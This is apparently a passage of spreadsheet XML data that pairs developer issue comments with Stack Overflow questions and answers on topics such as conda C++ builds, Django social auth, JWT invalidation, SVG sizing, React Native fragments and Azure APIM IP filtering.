# 1 &amp;quot;kcore.cc&amp;quot;
# 1 &amp;quot;&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include/boost/python.hpp&amp;quot; 1
# 11 &amp;quot;&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include/boost/python.hpp&amp;quot;
# 1 &amp;quot;&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include/boost/python/args.hpp&amp;quot; 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As always &lt;code&gt;&amp;lt;homedir&amp;gt;&lt;/code&gt; stands for my home directory.
What am I missing? WHat am I doing wrong? I suspect something with &lt;code&gt;g++&lt;/code&gt; or with the &lt;code&gt;conda&lt;/code&gt; environment which is causing this weird compilation&lt;/p&gt;
&lt;h2&gt;&lt;code&gt;gcc&lt;/code&gt; specs&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;$ which g++
&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/bin/g++
$ g++ --version
g++ (conda-forge gcc 14.2.0-1) 14.2.0
Copyright (C) 2024 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;&lt;code&gt;make&lt;/code&gt; file with &lt;code&gt;CONDA_PREFIX&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;This is my &lt;code&gt;Makefile&lt;/code&gt; as it is, i am already pinting the &lt;code&gt;CONDA_PREFIX&lt;/code&gt; variable, and seems to be correct&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PKG_CONFIG_PATH := $(CONDA_PREFIX)/lib/pkgconfig
PY3DOTVERSION=$(shell python -c &amp;quot;import sys; print(sys.version_info[0],sys.version_info[1],sep='.')&amp;quot;)
CXX := g++
CXXFLAGS := -O3 -fopenmp -std=gnu++17 -Wall -fPIC $(shell PKG_CONFIG_PATH=$(CONDA_PREFIX)/lib/pkgconfig pkg-config --cflags --libs graph-tool-py$(PY3DOTVERSION)) -I$(CONDA_PREFIX)/include -shared
all: libkcore.so
    @echo &amp;quot;CONDA_PREFIX is: $(CONDA_PREFIX)&amp;quot;
    @echo &amp;quot;PKG_CONFIG_PATH is: $(PKG_CONFIG_PATH)&amp;quot;
    @echo &amp;quot;PY3DOTVERSION is: $(PY3DOTVERSION)&amp;quot;
libkcore.so: kcore.hh kcore.cc
    ${CXX} ${CXXFLAGS} kcore.cc -o libkcore.so
clean:
    rm -f *.so
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The compilation takes place with &lt;code&gt;make all&lt;/code&gt; command&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;g++ -O3 -fopenmp -std=gnu++17 -Wall -fPIC -pthread 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/graph_tool/include 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/graph_tool/include/boost-workaround 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/graph_tool/include/pcg-cpp 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/cairo/include 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include/python3.12 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/python3.12/site-packages/numpy/core/include 
    -L&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib 
    -lboost_python312 
    -I&amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/include 
    -shared kcore.cc -o libkcore.so
CONDA_PREFIX is: &amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv
PKG_CONFIG_PATH is: &amp;lt;homedir&amp;gt;/anaconda3/envs/lrgsgenv/lib/pkgconfig
PY3DOTVERSION is: 3.12
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C238</t>
  </si>
  <si>
    <t>https://stackoverflow.com/questions/13018147/authalreadyassociated-exception-in-django-social-auth has an explanation:
DSA doesn't logout accounts (or flush sessions) at the moment. AuthAlreadyAssociated highlights the scenario where the current user is not associated to the current social account trying to be used.
I'm going to try this workaround from that thread:
from django.contrib.auth import logout
def social_user(backend, uid, user=None, *args, **kwargs):
    provider = backend.name
    social = backend.strategy.storage.user.get_social_auth(provider, uid)
    if social:
        if user and social.user != user:
            logout(backend.strategy.request)
        elif not user:
            user = social.user
    return {'social': social,
            'user': user,
            'is_new': user is None,
            'new_association': False}</t>
  </si>
  <si>
    <t>DSA doesn't logout accounts (or flush sessions) at the moment. AuthAlreadyAssociated highlights the scenario where the current user is not associated to the current social account trying to be used. There are a couple solutions that might suite your project:
Define a sub-class of social_auth.middleware.SocialAuthExceptionMiddleware and override the default behavior (process_exception()) to redirect or setup the warning you like in the way you prefer.
Add a pipeline method (replacing social_auth.backend.pipeline.social.social_auth_user) that logouts the current user instead of raising an exception.</t>
  </si>
  <si>
    <t xml:space="preserve">I am using the Model-View-Presenter pattern for a web page. Should the presenter be aware of Session or should only the view be aware of it?
I guess what I am getting at is that concepts like Session are very related to the architecture of the view so should they be limited to use by the view? Otherwise what would happen if I wanted to reuse the presenter on a similar page on a different architecture (or do I not need to worry about that unless I have plans to do so)?
</t>
  </si>
  <si>
    <t>C239</t>
  </si>
  <si>
    <t>The token based authentication is different than the session based one, I find some articles talking about refreshing token(similar concept as rolling) in a token based auth system:
https://stackoverflow.com/questions/26739167/jwt-json-web-token-automatic-prolongation-of-expiration
https://auth0.com/learn/refresh-tokens/
So it really depends on which method you use to track the user.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I make an SVG in HTML fit into a single screen without scrolling?&lt;/p&gt;
&lt;p&gt;I have a bottle shape that I designed in Figma and exported as an SVG tag element, which I want to display on a webpage such that it's centered and fills the screen as much as possible (preserving aspect ratio) but does not result in any scrollbars. I tried implementing the 100% &lt;code&gt;width&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; properties as directed by &lt;a href="https://stackoverflow.com/questions/19526919/making-inline-svg-fill-whole-screen"&gt;Making inline svg fill whole screen&lt;/a&gt;, but that results in the SVG filling the width of the screen but extending the height to require a vertical scrollbar. I've also read &lt;a href="https://stackoverflow.com/questions/3363843/how-to-make-svg-appear-without-scroll-bars-in-html"&gt;How to make SVG appear without scroll bars in html&lt;/a&gt;, but I don't understand how to use &lt;code&gt;embed&lt;/code&gt; or whether it's even possible to do so when my SVG is defined within the HTML document itself. What do I need to change?&lt;/p&gt;
&lt;p&gt;My current code is:&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html style="width:100%;height:100%;"&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;style&amp;gt;
.container {display: flex; justify-content: center;}
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body style="width:100%;height:100%;margin:0;"&amp;gt;
&amp;lt;div class="container"&amp;gt;
&amp;lt;svg width="100%" height="100%" viewBox="0 0 250 457" fill="none" xmlns="http://www.w3.org/2000/svg"&amp;gt;
&amp;lt;path d="M89.6174 72.5661C78.3761 70.8794 34.9222 93.2227 19 135.503M89.6174 72.5661V2H125M89.6174 72.5661H125M19 135.503C-0.902714 188.355 -0.0185633 201.762 9.29124 288.909C17.1881 362.829 33.8318 424.189 44.8889 432.248C60.9111 443.925 84 454.607 125 454.607M19 135.503C130.2 168.307 155 202.255 125 251.842" stroke="#B9B9B9" stroke-width="4"/&amp;gt;
&amp;lt;path d="M160.383 72.5661C171.624 70.8794 215.078 93.2227 231 135.503M160.383 72.5661V2H125M160.383 72.5661H125M231 135.503C250.903 188.355 250.019 201.762 240.709 288.909C232.812 362.829 216.168 424.189 205.111 432.248C189.089 443.925 166 454.607 125 454.607M231 135.503C119.8 168.307 95 202.255 125 251.842" stroke="#B9B9B9" stroke-width="4"/&amp;gt;
&amp;lt;/svg&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
&lt;p&gt;Here is what I had before implementing 100% &lt;code&gt;height&lt;/code&gt; and &lt;code&gt;width&lt;/code&gt; properties on the &lt;code&gt;html&lt;/code&gt;, &lt;code&gt;body&lt;/code&gt; and &lt;code&gt;svg&lt;/code&gt; tags (also &lt;code&gt;margin&lt;/code&gt; on the body), just taking the raw output from Figma and putting it in a flexbox with center justification:&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;style&amp;gt;
.container {display: flex; justify-content: center;}
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;div class="container"&amp;gt;
&amp;lt;svg width="250" height="457" viewBox="0 0 250 457" fill="none" xmlns="http://www.w3.org/2000/svg"&amp;gt;
&amp;lt;path d="M89.6174 72.5661C78.3761 70.8794 34.9222 93.2227 19 135.503M89.6174 72.5661V2H125M89.6174 72.5661H125M19 135.503C-0.902714 188.355 -0.0185633 201.762 9.29124 288.909C17.1881 362.829 33.8318 424.189 44.8889 432.248C60.9111 443.925 84 454.607 125 454.607M19 135.503C130.2 168.307 155 202.255 125 251.842" stroke="#B9B9B9" stroke-width="4"/&amp;gt;
&amp;lt;path d="M160.383 72.5661C171.624 70.8794 215.078 93.2227 231 135.503M160.383 72.5661V2H125M160.383 72.5661H125M231 135.503C250.903 188.355 250.019 201.762 240.709 288.909C232.812 362.829 216.168 424.189 205.111 432.248C189.089 443.925 166 454.607 125 454.607M231 135.503C119.8 168.307 95 202.255 125 251.842" stroke="#B9B9B9" stroke-width="4"/&amp;gt;
&amp;lt;/svg&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
&lt;p&gt;Below is with 100% &lt;code&gt;height&lt;/code&gt; and &lt;code&gt;width&lt;/code&gt; but without the &lt;code&gt;viewBox&lt;/code&gt; property, which truncates the SVGâ€”I don't understand why eliminating &lt;code&gt;viewBox&lt;/code&gt; cuts off the graphic:&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html style="width:100%;height:100%;"&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;style&amp;gt;
.container {display: flex; justify-content: center;}
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body style="width:100%;height:100%;margin:0;"&amp;gt;
&amp;lt;div class="container"&amp;gt;
&amp;lt;svg width="100%" height="100%" fill="none" xmlns="http://www.w3.org/2000/svg"&amp;gt;
&amp;lt;path d="M89.6174 72.5661C78.3761 70.8794 34.9222 93.2227 19 135.503M89.6174 72.5661V2H125M89.6174 72.5661H125M19 135.503C-0.902714 188.355 -0.0185633 201.762 9.29124 288.909C17.1881 362.829 33.8318 424.189 44.8889 432.248C60.9111 443.925 84 454.607 125 454.607M19 135.503C130.2 168.307 155 202.255 125 251.842" stroke="#B9B9B9" stroke-width="4"/&amp;gt;
&amp;lt;path d="M160.383 72.5661C171.624 70.8794 215.078 93.2227 231 135.503M160.383 72.5661V2H125M160.383 72.5661H125M231 135.503C250.903 188.355 250.019 201.762 240.709 288.909C232.812 362.829 216.168 424.189 205.111 432.248C189.089 443.925 166 454.607 125 454.607M231 135.503C119.8 168.307 95 202.255 125 251.842" stroke="#B9B9B9" stroke-width="4"/&amp;gt;
&amp;lt;/svg&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C24</t>
  </si>
  <si>
    <t>Android - Add a ReactFragment (#12199)
Summary:
React Native on Android has currently been focused and targeted at using an [Activity](https://developer.android.com/reference/android/app/Activity.html) for its main form of instantiation.
While this has probably worked for most companies and developers, you lose some of the modularity of a more cohesive application when working in a "brown-field" project that is currently native. This hurts more companies that are looking to adopt React Native and slowly implement it in a fully native application.
A lot of developers follow Android's guidelines of using Fragments in their projects, even if it is a debated subject in the Android community, and this addition will allow others to embrace React Native more freely. (I even assume it could help with managing navigation state in applications that contain a decent amount of Native code and would be appreciated in those projects. Such as sharing the Toolbar, TabBar, ViewPager, etc in Native Android)
Even with this addition, a developer will still need to host the fragment in an activity, but now that activity can contain native logic like a Drawer, Tabs, ViewPager, etc.
**Test plan (required)**
* We have been using this class at Hudl for over a couple of months and have found it valuable.
* If the community agrees on the addition, I can add documentation to the Android sections to include notes about the potential of this Fragment.
* If the community agrees on the addition, I can update one or more of the examples in the `/Examples` folder and make use of the Fragment, or even create a new example that uses a native layout manager like Drawer, Tabs, Viewpager, etc)
Make sure tests pass on both Travis and Circle CI.
_To Note:_
* There is also talk of using React Native inside Android Fragment's without any legit documentation, this could help remedy some of that with more documentation included in this PR https://facebook.github.io/react-native/releases/0.26/docs/embedded-app-android.html#sharing-a-reactinstance-across-multiple-activities-fragments-in-your-app
* Others have also requested something similar and have a half-baked solution as well http://stackoverflow.com/questions/35221447/react-native-inside-a-fragment</t>
  </si>
  <si>
    <t>I've managed to figure this out with much trial and error. I've seen this question asked around the internet and thought that this was the best place to post the answer. Here is how to do with the latest version of React (0.29 as of this writing):
The first thing we'll do is create an abstract
ReactFragment
class that we will use throughout our app:
public abstract class ReactFragment extends Fragment {
    private ReactRootView mReactRootView;
    private ReactInstanceManager mReactInstanceManager;
    // This method returns the name of our top-level component to show
    public abstract String getMainComponentName();
    @Override
    public void onAttach(Context context) {
        super.onAttach(context);
        mReactRootView = new ReactRootView(context);
        mReactInstanceManager =
                ((MyApplication) getActivity().getApplication())
                        .getReactNativeHost()
                        .getReactInstanceManager();
    }
    @Override
    public ReactRootView onCreateView(LayoutInflater inflater, ViewGroup group, Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        return mReactRootView;
    }
    @Override
    public void onActivityCreated(Bundle savedInstanceState) {
        super.onActivityCreated(savedInstanceState);
        mReactRootView.startReactApplication(
                mReactInstanceManager,
                getMainComponentName(),
                null
        );
    }
}
We'll now be able to create fragments that render React Native components, e.g.:
public class HelloFragment extends ReactFragment {
    @Override
    public String getMainComponentName() { 
        return "hellocomponent"; // name of our React Native component we've registered 
    }
}
A little more work is required, though. Our parent
Activity
needs to pass some things into the
ReactInstanceManager
in order for the React Native lifecycle to work properly. Here's what I ended up with:
public class FragmentActivity extends AppCompatActivity implements DefaultHardwareBackBtnHandler {
    /*
    * Get the ReactInstanceManager, AKA the bridge between JS and Android
    * We use a singleton here so we can reuse the instance throughout our app
    * instead of constantly re-instantiating and re-downloading the bundle
    */
    private ReactInstanceManager mReactInstanceManager;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_fragment);
        Toolbar toolbar = (Toolbar) findViewById(R.id.toolbar);
        setSupportActionBar(toolbar);
        FloatingActionButton fab = (FloatingActionButton) findViewById(R.id.fab);
        fab.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                Snackbar.make(view, "Replace with your own action", Snackbar.LENGTH_LONG)
                        .setAction("Action", null).show();
            }
        });
        /**
         * Get the reference to the ReactInstanceManager
         */
         mReactInstanceManager =
             ((MyApplication) getApplication()).getReactNativeHost().getReactInstanceManager();
        /*
        * We can instantiate a fragment to show for Activity programmatically,
        * or using the layout XML files.
        * This doesn't necessarily have to be a ReactFragment, any Fragment type will do.
        */
        Fragment viewFragment = new HelloFragment();
        getFragmentManager().beginTransaction().add(R.id.container, viewFragment).commit();
    }
    @Override
    public void invokeDefaultOnBackPressed() {
        super.onBackPressed();
    }
    /*
     * Any activity that uses the ReactFragment or ReactActivty
     * Needs to call onHostPause() on the ReactInstanceManager
     */
    @Override
    protected void onPause() {
        super.onPause();
        if (mReactInstanceManager != null) {
            mReactInstanceManager.onHostPause();
        }
    }
    /*
     * Same as onPause - need to call onHostResume
     * on our ReactInstanceManager
     */
    @Override
    protected void onResume() {
        super.onResume();
        if (mReactInstanceManager != null) {
            mReactInstanceManager.onHostResume(this, this);
        }
    }
    @Override
    public boolean onKeyUp(int keyCode, KeyEvent event) {
        if (keyCode == KeyEvent.KEYCODE_MENU &amp;&amp; mReactInstanceManager != null) {
            mReactInstanceManager.showDevOptionsDialog();
            return true;
        } 
        return super.onKeyUp(keyCode, event);
    }
}
Finally, you'll notice the reference to
(MyApplication)
throughout the code; this is a global
Application
object to contain our
ReactInstanceManager
, AKA the bridge between Android and React Native. This is the pattern that the React Native projects use internally, so I simply copied it. Here's how it's implemented:
public class MyApplication extends Application implements ReactApplication {
    private final ReactNativeHost mReactNativeHost = new ReactNativeHost(this) {
        @Override
        public boolean getUseDeveloperSupport() {
            return true;
        }
        @Override
        public List&lt;ReactPackage&gt; getPackages() {
            return Arrays.&lt;ReactPackage&gt;asList(
                    new MainReactPackage()
            );
        }
    };
    @Override
    public ReactNativeHost getReactNativeHost() {
        return mReactNativeHost;
    }
}
The trickiest bit was figuring out the lifecycle between the Fragment and the Activity; the
ReactRootView
needs a reference to the Activity context in order to instantiate, so making sure that
getActivity()
would not be null was important. Also, registering the
onHostPause()
and
onHostResume()
in the parent Activity was unintuitive at first, but ultimately proved simpler once the
ReactNativeInstanceManager
was abstracted away into a global instead of keeping it on the Activity or Fragment.
Hope this helps someone else out there!</t>
  </si>
  <si>
    <t xml:space="preserve">I have an application, built using MVC, that produces a view which delivers summary information across a number of models. Further to that, some calculations are performed across the different sets of data.
There's no clear single model (that maps to a table at least) that seems to make sense as the starting point for this, so the various summaries are pulled from the contributing models in the controller, passed into the view and the calculations are performed there.
But that seems, well, dirty. But controllers are supposed to be lightweight, aren't they? And business logic shouldn't be in views, as I have it as present.
So where should this information be assembled? A new model, that doesn't map to a table? A library function/module? Or something else?
(Although I see this as mostly of an architectural/pattern question, I'm working in Rails, FWIW.)
Edit: Good answers all round, and a lot of consensus, which is reassuring. I "accepted" the answer I did to keep the link to Railscasts at the top. I'm behind in my Railscast viewing - something I shall make strenuous attempts to rectify!
</t>
  </si>
  <si>
    <t>C240</t>
  </si>
  <si>
    <t>When a 403 is returned, ASP.NET wants to do a bunch of crap. But we haven't told it how. See this Stack Overflow post for more.
https://stackoverflow.com/questions/51142845/no-authenticationscheme-was-specified-and-there-was-no-defaultforbidscheme-foun</t>
  </si>
  <si>
    <t>Authorization and authentication are closely linked in ASP.NET Core. When authorization fails, this will be passed to an authentication handler to handle the authorization failure.
So even if you don’t need actual authentication to identify your users, you will still need to set up some authentication scheme that is able to handle forbid and challenge results (403 and 401).
To do that, you need to call
AddAuthentication()
and configure a default forbid/challenge scheme:
services.AddAuthentication(options =&gt;
{
    options.DefaultChallengeScheme = "scheme name";
    // you can also skip this to make the challenge scheme handle the forbid as well
    options.DefaultForbidScheme = "scheme name";
    // of course you also need to register that scheme, e.g. using
    options.AddScheme&lt;MySchemeHandler&gt;("scheme name", "scheme display name");
});
MySchemeHandler
needs to implement
IAuthenticationHandler
and in your case, you especially need to implement
ChallengeAsync
and
ForbidAsync
:
public class MySchemeHandler : IAuthenticationHandler
{
    private HttpContext _context;
    public Task InitializeAsync(AuthenticationScheme scheme, HttpContext context)
    {
        _context = context;
        return Task.CompletedTask;
    }
    public Task&lt;AuthenticateResult&gt; AuthenticateAsync()
        =&gt; Task.FromResult(AuthenticateResult.NoResult());
    public Task ChallengeAsync(AuthenticationProperties properties)
    {
        // do something
    }
    public Task ForbidAsync(AuthenticationProperties properties)
    {
        // do something
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">My employer is a large Swiss Telco. We have many Systems used to transfer data for different tasks, e.g. Performance Management, Fault Management, Configuration Management etc.
In order explain to  "Management" (pointy haired, and other) how these systems interact, I collected information about data flow/formats/protocols into a "database" ( of the comma delimited persuason) and then generated code for Graphviz ([external-link]) and Yed ([external-link]) to visualize these Graphs.
Showing these graphs generated from my DB was rather effective at first .. 
but adding new systems/data flows causes both Graphviz and Yed to re-layout the graphs, since that is how they work ... 
Naturally this really confuses anyone trying to match that graph seen yesterday, to the graph shown today.
How would you display/layout Data-Flow between Enterprise Applications?   
</t>
  </si>
  <si>
    <t>C241</t>
  </si>
  <si>
    <t>Add logout function to invalidate the accesstoken
Maybe I'm missing something, I'm not sure how the access token can be invalidated by removing it from the client. The application and LB has no control on the client side, so it cannot be the way to invalidate the token.
Is it possible to have an expiry date/time in the token if we don't have it already? If the user logs out, the token expiry value will be set to a past time, so that it is always expired when it is being validated next time. I'm thinking along the line of this: https://stackoverflow.com/questions/28759590/best-practices-to-invalidate-jwt-while-changing-passwords-and-logout-in-node-js/28804067.</t>
  </si>
  <si>
    <t>When No Refresh token is used:
1.While changing password:
when the user changes his password, note the change password time in the user db, so when the change password time is greater than the token creation time, then token is not valid. Hence the remaining session will get logged out soon.
2.When User logs out:
When the user logs out, save the token in a seperate DB (say: InvalidTokenDB and remove the token from Db when token expires). Hence user logs out from the respective device, his sessions in other device left undisturbed.
Hence while invalidating a JWT, I follow the below steps:
Check whether the token is valid or not.
If valid, check it is present in invalidTokenDB (a database where logged out tokens are stored till their expiry time).
If its not present, then check the token created time and changed password time in user db.
If changed password time &lt; token created time, then token is valid.
Concern with the above method
:
For each api request, I need to follow all the above steps, which might affect performance.
When Refresh token is used:
with expiry of access token as 1 day, refresh token as lifetime validity
1. While changing password:
When the user changes his password, change the refresh token of the user. Hence the remaining session will get logged out soon.
2. When User logs out
: When the user logs out, save the token in a seperate DB (say: InvalidTokenDB and remove the token from Db when token expires). Hence user logs out from the respective device, his sessions in other device left undisturbed.
Hence while invalidating a JWT, I follow the below steps:
check whether the token is valid or not
If valid, check whether the token is present in InvalidTokenDB.
If not present, check the refresh token with the refresh token in userDB.
If equals, then its a valid token
Concern with the above method
:
For each api request, I need to follow all the above steps, which might affect performance.
How do I invalidate the refresh token, as refresh token has no validity, if its used by hacker, still the authentication is valid one, request will be success always.
Note
: Although Hanz suggested a way to secure refresh token in
Using Refesh Token in Token-based Authentication is secured?
, I couldn't able to understand what he is saying. Any help is appreciated.
So If anyone have nice suggestion, your comments are welcome.
UPDATE:
I am adding the answer incase your app needs no refresh token with lifetime expiry. This answer was given by
Sudhanshu
(
https://stackoverflow.com/users/4062630/sudhanshu-gaur
). Thanks Sudhanshu. So I believe this is the best way to do this,
When No Refresh token needed and no expiry of access tokens:
when user login, create a login token in his user database with no expiry time.
Hence while invalidating a JWT, follow the below steps,
retrieve the user info and Check whether the token is in his User database. If so allow.
When user logs out, remove only this token from his user database.
When user changes his password, remove all tokens from his user database and ask him to login again.
So with this approach, you don't need to store neither logout tokens in database until their expiry nor storing token creation time while changing password which was needed in the above cases. However I believe this approach only valids if your app has requirements with no refresh token needed and no expiry of the tokens.
If anyone has concern with this approach, please let me know. Your comments are welcome :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The APIM &lt;code&gt;ip-filter&lt;/code&gt; policy doesn't support changing to check &lt;code&gt;X-Forwarded-For&lt;/code&gt; instead of request IP. I've tried using the &lt;code&gt;check-header&lt;/code&gt; policy, but I get the &lt;code&gt;X-Forwarded-For&lt;/code&gt; header with port suffixed &lt;code&gt;&amp;lt;ip&amp;gt;:&amp;lt;port&amp;gt;&lt;/code&gt;. I haven't found a way to make the &lt;code&gt;check-header&lt;/code&gt; check more advanced to take care of this (removing the port part).&lt;/p&gt;
&lt;p&gt;What I've come up with is this, but I don't like it, very bulky and a big if clause.&lt;/p&gt;
&lt;p&gt;Can anyone see how this can be solved in a simpler and neater way?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;inbound&amp;gt;
    &amp;lt;base /&amp;gt;
    &amp;lt;set-variable name=&amp;quot;allowedIPs&amp;quot; value=&amp;quot;192.192.192.192&amp;quot; /&amp;gt;
    &amp;lt;!-- Determine the IP address to check --&amp;gt;
    &amp;lt;set-variable name=&amp;quot;clientIP&amp;quot; value=&amp;quot;@(context.Request.Headers.GetValueOrDefault(&amp;quot;X-Forwarded-For&amp;quot;, context.Request.IpAddress))&amp;quot; /&amp;gt;
    &amp;lt;!-- The regular expression ^([\d\.]+) captures only the numeric part of the IP address (i.e., the part before any colon : that would indicate the port). --&amp;gt;
    &amp;lt;set-variable name=&amp;quot;cleanClientIP&amp;quot; value=&amp;quot;@(System.Text.RegularExpressions.Regex.Match((string)context.Variables[&amp;quot;clientIP&amp;quot;], @&amp;quot;^([\d\.]+)&amp;quot;).Value)&amp;quot; /&amp;gt;
    &amp;lt;!-- Function to check if the IP is allowed --&amp;gt;
    &amp;lt;choose&amp;gt;
        &amp;lt;when condition=&amp;quot;@(context.Variables.GetValueOrDefault&amp;lt;string&amp;gt;(&amp;quot;allowedIPs&amp;quot;).Split(',').Contains(context.Variables.GetValueOrDefault&amp;lt;string&amp;gt;(&amp;quot;cleanClientIP&amp;quot;)))&amp;quot;&amp;gt;
            &amp;lt;!-- REQUEST IS OK, ADD FURTHER LOGIC HERE --&amp;gt;
        &amp;lt;/when&amp;gt;
        &amp;lt;otherwise&amp;gt;
            &amp;lt;return-response&amp;gt;
                &amp;lt;set-status code=&amp;quot;403&amp;quot; reason=&amp;quot;Forbidden&amp;quot; /&amp;gt;
                &amp;lt;set-header name=&amp;quot;Content-Type&amp;quot; exists-action=&amp;quot;override&amp;quot;&amp;gt;
                    &amp;lt;value&amp;gt;application/json&amp;lt;/value&amp;gt;
                &amp;lt;/set-header&amp;gt;
                &amp;lt;set-body&amp;gt;{
&amp;quot;statusCode&amp;quot;: 403,
&amp;quot;message&amp;quot;: &amp;quot;Not authorized&amp;quot;
}&amp;lt;/set-body&amp;gt;
            &amp;lt;/return-response&amp;gt;
        &amp;lt;/otherwise&amp;gt;
    &amp;lt;/choose&amp;gt;
&amp;lt;/inbound&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I mainly want to achieve is:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Early exit (no big if clause)&lt;/li&gt;
&lt;li&gt;IPs in a list instead of in a comma separated string&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This you get by using &lt;code&gt;check-header&lt;/code&gt; or &lt;code&gt;ip-filter&lt;/code&gt;. See example below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;check-header name=&amp;quot;header name&amp;quot; failed-check-httpcode=&amp;quot;code&amp;quot; failed-check-error-message=&amp;quot;message&amp;quot; ignore-case=&amp;quot;true | false&amp;quot;&amp;gt;
    &amp;lt;value&amp;gt;Value1&amp;lt;/value&amp;gt;
    &amp;lt;value&amp;gt;Value2&amp;lt;/value&amp;gt;
&amp;lt;/check-header&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C242</t>
  </si>
  <si>
    <t>Digest auth does not send "Authorization" heade
I was able to figure out where the problem was. I find myself to be a victim Golang's notorious idiosyncrasies.
According to this - https://stackoverflow.com/questions/39427544/golang-http-response-headers-being-removed , I'm supposed to call WriteHeader() at the end. It is working fine after doing so.
Thanks and sorry for the trouble.</t>
  </si>
  <si>
    <t>Headers can only be written once to the response so you must set all the headers before writting them. Once the headers are written they are sent to the client.
You should only call
w.WriteHeader(http.StatusCreated)
once you have set all your headers.
Read in the GOLANG spec how WriteHeader works
This rule is the same for the body once the body is written (writting to the response is literally sending it to the client) it can not be resent or changed.</t>
  </si>
  <si>
    <t xml:space="preserve">I've written a .NET console app that wraps CuteFTP's Transfer Engine - a COM object (ftpte).  The version I wrapped is CuteFTP 7.0.  I'd like to also support the 8.0 version, as some of the clients I integrate with have that version.
I have a reference in my Visual Studio project to the CuteFTP COM object... how can I reference the version 8.0 component and still support version 7.0?  It seems to me that I'm forced to choose at design time, unless I make a bigger architectural shift.
Ideas?
</t>
  </si>
  <si>
    <t>C243</t>
  </si>
  <si>
    <t>Thanks! User credentials are apparently cached server-sideSending the credentials is handled by the browser.
I don't think this can be easily achieved, without implementing a middleware that handles authentication based on cookies and sessions.
See here for some info:
https://stackoverflow.com/questions/233507/how-to-log-out-user-from-web-site-using-basic-authentication
This is not currently on the road map, but I am open to suggestions how this could be implemented easily (or pull-requests of course)</t>
  </si>
  <si>
